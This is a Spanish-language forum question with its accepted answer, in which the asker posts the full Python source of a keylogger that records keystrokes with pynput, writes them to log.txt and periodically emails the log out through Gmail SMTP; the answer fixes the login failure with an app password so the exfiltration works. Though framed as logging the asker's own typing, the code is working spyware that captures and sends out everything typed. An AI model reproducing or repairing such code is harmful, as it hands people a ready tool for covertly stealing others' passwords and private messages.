# Error de autenticación Gmail

Tags: python

Recientemente, diseñe un keylogger para registrar MIS pulsaciones de teclas. Sin embargo, me he percatado de que, al ejecutar el código, aparece el siguiente error:

> smtplib.SMTPAuthenticationError: (535, b'5.7.8 Username and Password
> not accepted. Learn more at\n5.7.8
> https://support.google.com/mail/?p=BadCredentials gg22sm5648765pjb.17 - gsmtp')

He indagado sobre el tema y, en internet se menciona que es necesario habilitar el acceso a "aplicaciones menos seguras" en Gmail. Sin embargo, ya lo he hecho y no se envía el .txt a mi correo. ¿Qué puedo hacer para que me llegue el .txt a mi correo? Este es el código completo:

```
# -*- coding: utf-8 -*-
import os
import sys
import datetime
import time
import pynput
from pynput.keyboard import Key, Listener
import smtplib
import keyboard

import smtplib, ssl
import getpass

from email import encoders
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

def email():
    username = "correo@gmail.com"
    password = "contraseña1234" #Contraseña
    
    destinatario = "correo@gmail.com"
    asunto="Reporte"
    
    #crear el mensaje
    mensaje = MIMEMultipart("alternative") #estandar
    mensaje["Subject"] = asunto
    mensaje["From"] = username
    mensaje["To"] = destinatario
    
    html = f"""
    <html>
    <body>
        Hola {destinatario}<br>
        Te mando este archivo <b>muy bien</b> :)
    </body>
    </html>
    """
    # el contenido del mensaje como html
    parte_html= MIMEText(html, "html")
    # #agregar ese contenido al mensaje
    mensaje.attach(parte_html)
    archivo="log.txt"
    with open(archivo, "rb") as adjunto:
        contenido_adjunto = MIMEBase("application", "octet-stream")
        contenido_adjunto.set_payload(adjunto.read())
        encoders.encode_base64(contenido_adjunto)
        contenido_adjunto.add_header(
            "Content-Disposition",
            f"attachment; filename= {archivo}",
            )
        mensaje.attach(contenido_adjunto)
        mensaje_final = mensaje.as_string()
        #crear la conexion
        context = ssl.create_default_context()
        
        with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
            server.login(username,password)
            print("Inició sesión!")
            server.sendmail(username, destinatario, mensaje_final)
            print("Mensaje enviado")

count=0
keys=[]
active=0
arr=[]
def on_press(key):
    global keys,count,active,arr

    if key == Key.enter:

        for i in range(len(keys)):
            if active %2 !=0:
                keys[i] = str(keys[i]).upper()

            if keys[i] == "+":
                active+=1

        
        for i in range(len(keys)):
            if keys[i]=="+":
                pass
            else:
                arr.append(keys[i])

        keys=arr

        keys.append("\n")

        write_file(keys,count)
        keys=[]
        arr=[]
        
        count+=1
        if count>5:
            email()
            if os.path.exists("log.txt"):
                os.remove("log.txt")
            count=0


    elif key=='"':
        keys.append('"')
    elif key== Key.shift_r:
        keys.append("")
        
    elif key== Key.ctrl_l:
        keys.append("")

    elif key == Key.space:
        keys.append(" ")  

    elif key == Key.backspace:
        if len(keys)==0:
            pass
        else:
            keys.pop(-1)

    elif key == Key.caps_lock:
        keys.append("+")

    else:
        keys.append(key)

    print("{0}".format(key))
    
def write_file(keys,count):
    with open("log.txt", "a") as f:
        f.write(time.strftime("%d/%m/%y   "))
        f.write(time.strftime("%I:%M:%S   "))
        for key in keys:
            k=str(key).replace("'","")

            if k.find("\n")>0:
                f.write(k)
            
            # elif key.find('"a')>0:
            #     f.write()
                
            elif k.find('Key')== -1:
                f.write(k)
            
        
def on_release(key):
    
    if key == Key.esc:
        return False
    
def main():
    if os.path.exists("log.txt"):
        os.remove("log.txt")
    else:  
        pass
    
    with Listener(on_press=on_press, on_release=on_release) as listener:
        listener.join()
    
if __name__== '__main__':
    main()
```

Comment: lo mejor es crear una clave de aplicación (o algo asi era), pues es la forma mas segura de que alguna aplicación acceda a tu Gmail

Comment: @Christian Déjame lo intento y ya te digo que pasa, ok?

Comment: @Christian ¡Funciono! De verdad, muchas gracias, ¡Christian! Pon tu comentario como respuesta para marcarla como la mejor, te agradezco tu ayuda.

Comment: no creo que una respuesta sea adecuada, pero si quieres puedes responder a tu propia pregunta

Answer (score 1, accepted):

Para solucionar el problema, habilita la **autenticación en dos pasos** (2FA) mediante la pestaña de "seguridad" de la cuenta de Google. Después de hacer esto, crea una **clave de aplicación** (16 dígitos) y coloca esa contraseña en el código:

```
def email():
username = "correo@gmail.com"
password = "Contraseña de 16 dígitos" #Clave de aplicación

destinatario = "correo@gmail.com"
asunto="Reporte"
```

Comment: muy bien, así esta mejor :)